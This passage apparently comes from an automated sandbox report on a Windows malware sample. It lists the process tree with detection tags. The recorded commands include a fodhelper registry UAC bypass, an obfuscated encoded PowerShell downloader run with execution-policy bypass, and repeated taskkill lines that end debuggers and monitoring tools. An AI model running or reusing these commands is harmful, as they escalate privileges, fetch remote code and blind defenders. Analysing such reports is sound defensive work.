hAGgAaQBhAGQAJgBpAGQAPQAxAHkAegBJAFAAUABzADgAMgA4AEQARgBTAGQAZwBPAGwAYgBQAGoAVQBjADAAMAA2AHoARgBqAHIAawBSAGsASgBXAEQAYgBjAGgARgAwAHUAJwAnAC4AUgBlAHAAbABhAGMAZQAoACcAJwBKAHUAZAAyAE4AQgBJACcAJwAsACcAJwB0AHQAcABzADoALwAvACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAJwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQAnACcALAAnACcAbwAnACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnACcAUABQAHMAOAAyADgARABGAFMAJwAnACwAIAAnACcAZQAnACcAKQApACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwAnACwAIAAnAGUAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAcABwADgAMwA4ADMAagBuAEQAJwAsACAAJwB3AG4AbABvAGEAZABTACcAKQApACkAKQA=" /f
    3⤵
    - Modifies registry class
    - Modifies registry key
    PID:4860
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKCU\Software\Classes\ms-settings\CurVer /d .alecar /f
    3⤵
    - Modifies registry class
    - Modifies registry key
    PID:1808
- - C:\Windows\system32\fodhelper.exe
    "C:\Windows\system32\fodhelper.exe"
    3⤵
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:2092
  - - C:\Users\Public\Music\SystemProcessHost.SystemProcesses
      "C:\Users\Public\Music\SystemProcessHost.SystemProcesses" powershell -exEC byPASs -enc JAB0AHMAawBsAHIAZQB4AFIAZwA3AHoAcgBLAFcANABmAFUAdQBRADMAOABmADQAOQB3AE8AdQB0AHgANAA0AGIATAA4ADQAMQBxADcAegA5AHAAQQBEAEcAZwAwAFgAbAA0AFEAaQBuADEARABTAFYATwBPAEQAMgBIAGUASgBkAEsAUwBCAFYAMQA1AGMAVgBOADkANQBLAEsAOAAwADQAMQBZAGEAawBGAHoANgBlAHgAbQAzAHUAOAB2AEQANwBLADgATABPAGcASABHAE4AdwBVAGMAMQAxAGEANQBmADYAMgAwADgAQQBKADMAMABOAEQAYgA1ADMATgAyAHkANgA0AEgARgBEAEQAMgBuAFgANAA3ADEAVwBxAEwAcQA3AEIATQA2ADgAegBIAHkAcgB6AG0ASABWAFIARgBZAFgAOAAzAGQAbAAyAEkAVgBYAHUASQB2ADEAWgBFAEcANQBqAFAAZgBmADMAYQB0AEoAOQBXADkAVABCADQAcgB6ADIAaAA5ADUAMgBSAEEARQA5ADcAaABDAHAAMABnADgAMwB6ADcAQwBuADAANwBqADUAUwA4ADgARQBWAHMANQBnAHIAdgBqADIANQA2AFoAWQBFAEoATQBJADcARABoAGYANwA3AFoAaAA3ADIAOABkAEIAMwA1AG8AUgBPADUAdQAwAE8AUQBXADAANgAyAHcAMwBTAGEAMgBoAFEAOQBsAHkAUQBPAG8AMABYAFkAVQBHAFYAOAA3AHAAVQBZADUAdQBmAGwAQQB6ADAAWgBUAGUAeABKAEkANQAxAHMASgA5AEkATAB3AHUAVQBCAFUAeABWADEANwA3ADkAUQBlADIAZAB0AHYAeAAwAEgAMAA2ADQAMQBLAEYAdwBDAD0AJwBJAG4AJwArACcAVgBvACcAKwAnAGsAJwArACcARQAtAEUAeAAnACsAJwBQACcAKwAnAHIAZQAnACsAJwBTAHMAJwArACcASQBvACcAKwAnAG4AJwA7AHMAYQBsACAAdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAgACQAdABzAGsAbAByAGUAeABSAGcANwB6AHIASwBXADQAZgBVAHUAUQAzADgAZgA0ADkAdwBPAHUAdAB4ADQANABiAEwAOAA0ADEAcQA3AHoAOQBwAEEARABHAGcAMABYAGwANABRAGkAbgAxAEQAUwBWAE8ATwBEADIASABlAEoAZABLAFMAQgBWADEANQBjAFYATgA5ADUASwBLADgAMAA0ADEAWQBhAGsARgB6ADYAZQB4AG0AMwB1ADgAdgBEADcASwA4AEwATwBnAEgARwBOAHcAVQBjADEAMQBhADUAZgA2ADIAMAA4AEEASgAzADAATgBEAGIANQAzAE4AMgB5ADYANABIAEYARABEADIAbgBYADQANwAxAFcAcQBMAHEANwBCAE0ANgA4AHoASAB5AHIAegBtAEgAVgBSAEYAWQBYADgAMwBkAGwAMgBJAFYAWAB1AEkAdgAxAFoARQBHADUAagBQAGYAZgAzAGEAdABKADkAVwA5AFQAQgA0AHIAegAyAGgAOQA1ADIAUgBBAEUAOQA3AGgAQwBwADAAZwA4ADMAegA3AEMAbgAwADcAagA1AFMAOAA4AEUAVgBzADUAZwByAHYAagAyADUANgBaAFkARQBKAE0ASQA3AEQAaABmADcANwBaAGgANwAyADgAZABCADMANQBvAFIATwA1AHUAMABPAFEAVwAwADYAMgB3ADMAUwBhADIAaABRADkAbAB5AFEATwBvADAAWABZAFUARwBWADgANwBwAFUAWQA1AHUAZgBsAEEAegAwAFoAVABlAHgASgBJADUAMQBzAEoAOQBJAEwAdwB1AFUAQgBVAHgAVgAxADcANwA5AFEAZQAyAGQAdAB2AHgAMABIADAANgA0ADEASwBGAHcAQwA7ACQAcAB6AGgAaABxAGQAdwBsAD0AdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAoAHUAYgBpAGoAdABhAHMAawBvAHYAZQBpAGQAbwBkAGEAagBlAGsAcwBsAHUAegBuAGUAKAAkACgAJAAoACcAKABuAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB3AC0AbwBiAGoAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AGMAdAAgAFMAeQBzAHQAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AG0ALgBOAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB0AC4AVwB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAYgBDAGwAaQB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAbgB0ACkALgBEAG8AcABwADgAMwA4ADMAagBuAEQAdAByAGkAbgBnACgAJwAnAGgASgB1AGQAMgBOAEIASQBkAHIAaQB2AFAAUABzADgAMgA4AEQARgBTAC4AZwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBnAGwAUABQAHMAOAAyADgARABGAFMALgBjAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpAG0ALwB1AGMAPwBQAFAAcwA4ADIAOABEAEYAUwB4AHAAVQBpAGgAZABhAHMAOAA3AHUAaAB3AGYAYQBoAGkAcgB0AD0AZABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQB3AG4AbABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBhAGQAJgBpAGQAPQAxAHkAegBJAFAAUABzADgAMgA4AEQARgBTAGQAZwBPAGwAYgBQAGoAVQBjADAAMAA2AHoARgBqAHIAawBSAGsASgBXAEQAYgBjAGgARgAwAHUAJwAnAC4AUgBlAHAAbABhAGMAZQAoACcAJwBKAHUAZAAyAE4AQgBJACcAJwAsACcAJwB0AHQAcABzADoALwAvACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAJwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQAnACcALAAnACcAbwAnACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnACcAUABQAHMAOAAyADgARABGAFMAJwAnACwAIAAnACcAZQAnACcAKQApACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwAnACwAIAAnAGUAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAcABwADgAMwA4ADMAagBuAEQAJwAsACAAJwB3AG4AbABvAGEAZABTACcAKQApACkAKQA=
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4360
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -exEC byPASs -enc JAB0AHMAawBsAHIAZQB4AFIAZwA3AHoAcgBLAFcANABmAFUAdQBRADMAOABmADQAOQB3AE8AdQB0AHgANAA0AGIATAA4ADQAMQBxADcAegA5AHAAQQBEAEcAZwAwAFgAbAA0AFEAaQBuADEARABTAFYATwBPAEQAMgBIAGUASgBkAEsAUwBCAFYAMQA1AGMAVgBOADkANQBLAEsAOAAwADQAMQBZAGEAawBGAHoANgBlAHgAbQAzAHUAOAB2AEQANwBLADgATABPAGcASABHAE4AdwBVAGMAMQAxAGEANQBmADYAMgAwADgAQQBKADMAMABOAEQAYgA1ADMATgAyAHkANgA0AEgARgBEAEQAMgBuAFgANAA3ADEAVwBxAEwAcQA3AEIATQA2ADgAegBIAHkAcgB6AG0ASABWAFIARgBZAFgAOAAzAGQAbAAyAEkAVgBYAHUASQB2ADEAWgBFAEcANQBqAFAAZgBmADMAYQB0AEoAOQBXADkAVABCADQAcgB6ADIAaAA5ADUAMgBSAEEARQA5ADcAaABDAHAAMABnADgAMwB6ADcAQwBuADAANwBqADUAUwA4ADgARQBWAHMANQBnAHIAdgBqADIANQA2AFoAWQBFAEoATQBJADcARABoAGYANwA3AFoAaAA3ADIAOABkAEIAMwA1AG8AUgBPADUAdQAwAE8AUQBXADAANgAyAHcAMwBTAGEAMgBoAFEAOQBsAHkAUQBPAG8AMABYAFkAVQBHAFYAOAA3AHAAVQBZADUAdQBmAGwAQQB6ADAAWgBUAGUAeABKAEkANQAxAHMASgA5AEkATAB3AHUAVQBCAFUAeABWADEANwA3ADkAUQBlADIAZAB0AHYAeAAwAEgAMAA2ADQAMQBLAEYAdwBDAD0AJwBJAG4AJwArACcAVgBvACcAKwAnAGsAJwArACcARQAtAEUAeAAnACsAJwBQACcAKwAnAHIAZQAnACsAJwBTAHMAJwArACcASQBvACcAKwAnAG4AJwA7AHMAYQBsACAAdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAgACQAdABzAGsAbAByAGUAeABSAGcANwB6AHIASwBXADQAZgBVAHUAUQAzADgAZgA0ADkAdwBPAHUAdAB4ADQANABiAEwAOAA0ADEAcQA3AHoAOQBwAEEARABHAGcAMABYAGwANABRAGkAbgAxAEQAUwBWAE8ATwBEADIASABlAEoAZABLAFMAQgBWADEANQBjAFYATgA5ADUASwBLADgAMAA0ADEAWQBhAGsARgB6ADYAZQB4AG0AMwB1ADgAdgBEADcASwA4AEwATwBnAEgARwBOAHcAVQBjADEAMQBhADUAZgA2ADIAMAA4AEEASgAzADAATgBEAGIANQAzAE4AMgB5ADYANABIAEYARABEADIAbgBYADQANwAxAFcAcQBMAHEANwBCAE0ANgA4AHoASAB5AHIAegBtAEgAVgBSAEYAWQBYADgAMwBkAGwAMgBJAFYAWAB1AEkAdgAxAFoARQBHADUAagBQAGYAZgAzAGEAdABKADkAVwA5AFQAQgA0AHIAegAyAGgAOQA1ADIAUgBBAEUAOQA3AGgAQwBwADAAZwA4ADMAegA3AEMAbgAwADcAagA1AFMAOAA4AEUAVgBzADUAZwByAHYAagAyADUANgBaAFkARQBKAE0ASQA3AEQAaABmADcANwBaAGgANwAyADgAZABCADMANQBvAFIATwA1AHUAMABPAFEAVwAwADYAMgB3ADMAUwBhADIAaABRADkAbAB5AFEATwBvADAAWABZAFUARwBWADgANwBwAFUAWQA1AHUAZgBsAEEAegAwAFoAVABlAHgASgBJADUAMQBzAEoAOQBJAEwAdwB1AFUAQgBVAHgAVgAxADcANwA5AFEAZQAyAGQAdAB2AHgAMABIADAANgA0ADEASwBGAHcAQwA7ACQAcAB6AGgAaABxAGQAdwBsAD0AdQBiAGkAagB0AGEAcwBrAG8AdgBlAGkAZABvAGQAYQBqAGUAawBzAGwAdQB6AG4AZQAoAHUAYgBpAGoAdABhAHMAawBvAHYAZQBpAGQAbwBkAGEAagBlAGsAcwBsAHUAegBuAGUAKAAkACgAJAAoACcAKABuAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB3AC0AbwBiAGoAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AGMAdAAgAFMAeQBzAHQAdQB1AGkASQBVAGgAdQBzAGEAaQBkADcAOABoAHUAaQB3AG0ALgBOAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwB0AC4AVwB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAYgBDAGwAaQB1AHUAaQBJAFUAaAB1AHMAYQBpAGQANwA4AGgAdQBpAHcAbgB0ACkALgBEAG8AcABwADgAMwA4ADMAagBuAEQAdAByAGkAbgBnACgAJwAnAGgASgB1AGQAMgBOAEIASQBkAHIAaQB2AFAAUABzADgAMgA4AEQARgBTAC4AZwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBnAGwAUABQAHMAOAAyADgARABGAFMALgBjAFUAaQBoAGQAYQBzADgANwB1AGgAdwBmAGEAaABpAG0ALwB1AGMAPwBQAFAAcwA4ADIAOABEAEYAUwB4AHAAVQBpAGgAZABhAHMAOAA3AHUAaAB3AGYAYQBoAGkAcgB0AD0AZABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQB3AG4AbABVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQBhAGQAJgBpAGQAPQAxAHkAegBJAFAAUABzADgAMgA4AEQARgBTAGQAZwBPAGwAYgBQAGoAVQBjADAAMAA2AHoARgBqAHIAawBSAGsASgBXAEQAYgBjAGgARgAwAHUAJwAnAC4AUgBlAHAAbABhAGMAZQAoACcAJwBKAHUAZAAyAE4AQgBJACcAJwAsACcAJwB0AHQAcABzADoALwAvACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAJwBVAGkAaABkAGEAcwA4ADcAdQBoAHcAZgBhAGgAaQAnACcALAAnACcAbwAnACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnACcAUABQAHMAOAAyADgARABGAFMAJwAnACwAIAAnACcAZQAnACcAKQApACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAnAHUAdQBpAEkAVQBoAHUAcwBhAGkAZAA3ADgAaAB1AGkAdwAnACwAIAAnAGUAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAcABwADgAMwA4ADMAagBuAEQAJwAsACAAJwB3AG4AbABvAGEAZABTACcAKQApACkAKQA=
        5⤵
        Blocklisted process makes network request
        Drops file in Drivers directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2416
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3772
      - C:\Windows\system32\reg.exe
        
        "C:\Windows\system32\reg.exe" import C:\ProgramData\SysWebConfig\ass
        6⤵
        
        PID:4328
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2436
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4592
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4004
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1144
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2452
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4688
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3748
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3144
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:344
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4936
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3440
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3800
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4464
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1844
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1876
      - C:\Windows\system32\taskkill.exe
        
